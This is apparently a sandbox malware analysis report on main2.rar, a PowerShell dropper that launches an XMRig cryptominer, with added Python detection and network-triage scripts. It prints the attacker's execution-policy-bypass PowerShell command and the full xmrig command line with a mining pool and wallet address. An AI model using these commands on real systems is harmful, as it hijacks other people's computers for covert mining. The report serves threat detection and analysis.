Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 20:13
Signatures
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240426-en
Max time kernel
290s
Max time network
286s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3080 wrote to memory of 4388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3080 wrote to memory of 4388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
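The two command lines above are the whole chain: powershell.exe started with -ExecutionPolicy bypass runs a .ps1 from the user's Temp directory, and the process it spawns is xmrig.exe pointed at an unMineable stratum+ssl pool with a COIN:address.worker user string and the placeholder password x. The "PID 3080 wrote to memory of 4388" rows are the parent writing the new child's startup data at creation, not injection into an unrelated process, and the SeLockMemoryPrivilege rows are xmrig enabling large pages for the RandomX algorithm selected by -a rx. The following is an added example (not part of this report and not the sandbox's own code) that runs that detection over constructed process-creation events modelled on the behavioral11 run: the parent PID of powershell.exe, the notepad.exe control event, the user-writable directory pattern and the hypothetical Sysmon-style field names are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Optional
from urllib.parse import urlsplit

# Constructed process-creation events (Sysmon Event ID 1 style) modelled on the
# Processes section of this report. Images, PIDs and command lines are copied
# from the behavioral11 run; the parent PID of powershell.exe and the notepad.exe
# control event are assumptions, since the report does not show them.
SAMPLE_EVENTS = [
    {"ProcessId": 3080, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"'},
    {"ProcessId": 4388, "ParentProcessId": 3080,
     "Image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "CommandLine": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
    {"ProcessId": 5000, "ParentProcessId": 3080,   # benign control: same parent, not a miner
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\Admin\Desktop\notes.txt"},
]

STRATUM_SCHEMES = {"stratum", "stratum+tcp", "stratum+ssl", "stratum+tls"}
# XMRig flags that carry the pool configuration (short and long forms).
MINER_FLAGS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
               "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
# Directories a standard user can write to (assumption: extend for your estate).
USER_WRITABLE_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|ProgramData|Users\\Public)\\", re.I)
# powershell.exe accepts unambiguous parameter prefixes, so -ep / -exec bypass are the same thing.
EP_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+(?:bypass|unrestricted)\b", re.I)
FILE_ARG = re.compile(r'-File\s+"?([^"]+?\.ps1)"?', re.I)


def split_cmdline(cmdline: str) -> list[str]:
    """Tokenise a Windows command line: quoted spans stay whole, backslashes are literal."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


@dataclass
class MinerConfig:
    algo: Optional[str]
    scheme: str
    pool_host: str
    pool_port: Optional[int]
    wallet: str
    worker: Optional[str]


def parse_xmrig_args(cmdline: str) -> Optional[MinerConfig]:
    """Return the pool/wallet configuration if the command line carries XMRig-style mining flags, else None."""
    toks = split_cmdline(cmdline)
    opts = {}
    for i, tok in enumerate(toks):
        flag, eq, inline = tok.partition("=")          # accept both "-o url" and "--url=url"
        if flag in MINER_FLAGS:
            if eq:
                opts[MINER_FLAGS[flag]] = inline
            elif i + 1 < len(toks):
                opts[MINER_FLAGS[flag]] = toks[i + 1]
    url = opts.get("url")
    if not url:
        return None
    if "://" not in url:                                # XMRig treats a bare host:port as stratum+tcp
        url = "stratum+tcp://" + url
    parts = urlsplit(url)
    if parts.scheme.lower() not in STRATUM_SCHEMES:
        return None
    wallet, _, worker = opts.get("user", "").partition(".")   # XMRig convention: wallet.worker
    return MinerConfig(opts.get("algo"), parts.scheme.lower(), parts.hostname or "",
                       parts.port, wallet, worker or None)


@dataclass
class Detection:
    parent_pid: int
    child_pid: int
    script: Optional[str]
    miner_image: str
    miner: MinerConfig


def is_bypass_powershell(ev: dict) -> bool:
    image = ev["Image"].lower()
    return image.endswith(("\\powershell.exe", "\\pwsh.exe")) and bool(EP_BYPASS.search(ev["CommandLine"]))


def find_miner_chains(events: Iterable[dict]) -> list[Detection]:
    """Flag a bypass-policy PowerShell whose child is a stratum miner running from a user-writable directory."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    hits = []
    for ev in by_pid.values():
        parent = by_pid.get(ev["ParentProcessId"])
        if parent is None or not is_bypass_powershell(parent):
            continue
        if not USER_WRITABLE_DIR.search(ev["Image"]):
            continue
        miner = parse_xmrig_args(ev["CommandLine"])
        if miner is None:
            continue
        m = FILE_ARG.search(parent["CommandLine"])
        hits.append(Detection(parent["ProcessId"], ev["ProcessId"], m.group(1) if m else None, ev["Image"], miner))
    return hits


if __name__ == "__main__":
    for d in find_miner_chains(SAMPLE_EVENTS):
        print(f"PID {d.parent_pid} powershell -File {d.script!r} -> PID {d.child_pid} {d.miner_image}")
        print(f"  {d.miner.scheme}://{d.miner.pool_host}:{d.miner.pool_port} algo={d.miner.algo} "
              f"wallet={d.miner.wallet[:20]}... worker={d.miner.worker}")
```

The wallet and worker string are the durable indicator here: the pool host and the drop path change between campaigns, but a miner paid to the same address is the same operator, so the parsed wallet is what to pivot on across other reports.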
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 121.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
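Most rows in this table are not the sample's own traffic: the *.in-addr.arpa queries are the sandbox resolver doing reverse lookups of addresses just contacted, and the bing.com rows are the Windows image itself. What remains is the two-stage pattern the Files section confirms: github.com and then objects.githubusercontent.com (where GitHub release assets are served, consistent with the dropped xmrig-6.21.3 directory) over 443, followed by the stratum+ssl session to rx.unmineable.com:443 from the miner's command line. The following is an added example (mine, not the report's or the sandbox's) that parses the table in the page's own layout, decodes the PTR names back to addresses so reverse lookups of contacted IPs can be separated from lookups of addresses never seen as a destination, and buckets the TCP rows. The rows are copied from this run plus the behavioral22 row that has no domain; the noise and code-hosting suffix lists and the pool host set are assumptions an analyst would maintain.

```python
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed copy of Network rows from this report in the page's own layout:
# a subset of the behavioral11 table, plus the behavioral22 row without a domain.
NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
"""

# Analyst-maintained lists (assumptions, not from the report): domains the sandbox
# OS contacts on its own, and code-hosting domains used to stage the dropped binary.
SANDBOX_NOISE = ("bing.com", "microsoft.com", "windowsupdate.com", "msftconnecttest.com")
CODE_HOSTING = ("github.com", "githubusercontent.com")
PTR_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa$", re.I)


@dataclass(frozen=True)
class Row:
    country: str
    ip: str
    port: int
    domain: str
    proto: str


def parse_rows(text: str) -> list[Row]:
    """Parse '| CC | ip:port | domain | proto |' lines; header and blank lines are skipped."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        rows.append(Row(country, ip, int(port), domain.lower(), proto.lower()))
    return rows


def ptr_to_ip(name: str) -> Optional[str]:
    """'133.108.199.185.in-addr.arpa' -> '185.199.108.133'; None for a forward-lookup name."""
    m = PTR_RE.match(name)
    if not m:
        return None
    try:
        return str(ipaddress.ip_address(".".join(reversed(m.groups()))))
    except ValueError:                      # octet out of range: not a real PTR name
        return None


def has_suffix(domain: str, suffixes) -> bool:
    return any(domain == s or domain.endswith("." + s) for s in suffixes)


def triage(text: str, pool_hosts: set[str]) -> dict[str, list]:
    """Bucket the rows: resolver noise versus the connections that are actually the sample's."""
    rows = parse_rows(text)
    contacted = {r.ip for r in rows if r.proto == "tcp"}
    out = defaultdict(list)
    for r in rows:
        if r.proto == "udp" and r.port == 53:
            ip = ptr_to_ip(r.domain)
            if ip is None:
                out["dns_forward"].append(r.domain)     # implied by the TCP row that follows it
            elif ip in contacted:
                out["ptr_of_contacted"].append(ip)      # reverse lookup of a destination: resolver noise
            else:
                out["ptr_uncontacted"].append(ip)       # address never seen as a destination here
            continue
        entry = (r.ip, r.port, r.domain)
        if r.domain in pool_hosts:
            out["pool"].append(entry)
        elif has_suffix(r.domain, SANDBOX_NOISE):
            out["sandbox_noise"].append(entry)
        elif has_suffix(r.domain, CODE_HOSTING):
            out["payload_staging"].append(entry)
        else:
            out["review"].append(entry)                 # no domain or unknown host: check by hand
    return dict(out)


def blocklist_candidates(result: dict[str, list]) -> list[str]:
    """Pool host and address, plus unattributed destinations, as the indicators worth blocking."""
    items = set()
    for ip, _port, domain in result.get("pool", []):
        items.update({ip, domain})
    for ip, _port, _domain in result.get("review", []):
        items.add(ip)
    return sorted(items)


if __name__ == "__main__":
    result = triage(NETWORK_TABLE, {"rx.unmineable.com"})
    for bucket, entries in result.items():
        print(f"{bucket:18} {entries}")
    print("block:", blocklist_candidates(result))
```

The github.com and objects.githubusercontent.com rows go into their own bucket rather than the blocklist on purpose: they identify the staging channel, which is useful for hunting the download in proxy logs, but blocking them would break far more than this miner.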
Files
memory/3080-0-0x00007FFAD31E3000-0x00007FFAD31E5000-memory.dmp
memory/3080-2-0x0000023BA5700000-0x0000023BA5722000-memory.dmp
memory/3080-11-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-12-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a00i550d.epz.ps1 (AppLocker/WDAC policy-test file written by powershell.exe itself at startup, not a file dropped by the sample; its hashes are not indicators)
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3080-13-0x00007FFAD31E3000-0x00007FFAD31E5000-memory.dmp
memory/3080-14-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-15-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-17-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-19-0x0000023BA5740000-0x0000023BA574A000-memory.dmp
memory/3080-18-0x0000023BA5750000-0x0000023BA5762000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4388-50-0x00000280187E0000-0x0000028018800000-memory.dmp
memory/4388-51-0x0000028018A30000-0x0000028018A50000-memory.dmp
memory/4388-52-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-53-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-54-0x0000028018A50000-0x0000028018A70000-memory.dmp
memory/4388-55-0x000002801A220000-0x000002801A240000-memory.dmp
memory/4388-56-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/3080-57-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/4388-58-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-60-0x0000028018A50000-0x0000028018A70000-memory.dmp
memory/4388-59-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-61-0x000002801A220000-0x000002801A240000-memory.dmp
memory/4388-62-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-63-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-64-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-65-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-66-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-67-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-68-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-69-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-70-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-71-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-72-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-73-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-74-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-75-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-76-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-77-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-78-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-79-0x00007FF725020000-0x00007FF725C53000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
294s
Max time network
303s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2268 wrote to memory of 4188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2268 wrote to memory of 4188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/2268-3-0x00007FF954663000-0x00007FF954664000-memory.dmp
memory/2268-5-0x0000020CA2B90000-0x0000020CA2BB2000-memory.dmp
memory/2268-8-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-9-0x0000020CA2D70000-0x0000020CA2DE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nu45rb01.ef2.ps1 (AppLocker/WDAC policy-test file written by powershell.exe itself at startup, not a file dropped by the sample; the hashes below are those of the one-byte content "1" and are not indicators)
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2268-10-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-25-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-29-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-30-0x00007FF954663000-0x00007FF954664000-memory.dmp
memory/2268-31-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-32-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-65-0x0000020CA2D40000-0x0000020CA2D4A000-memory.dmp
memory/2268-52-0x0000020CA2D50000-0x0000020CA2D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4188-94-0x00000257DA340000-0x00000257DA360000-memory.dmp
memory/4188-95-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-96-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-97-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-98-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-99-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-100-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-101-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-102-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-103-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-104-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-105-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-106-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-107-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-108-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-109-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-110-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-111-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-112-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-113-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-114-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-115-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-116-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-117-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-118-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-119-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
294s
Max time network
301s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2776 wrote to memory of 3540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2776 wrote to memory of 3540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
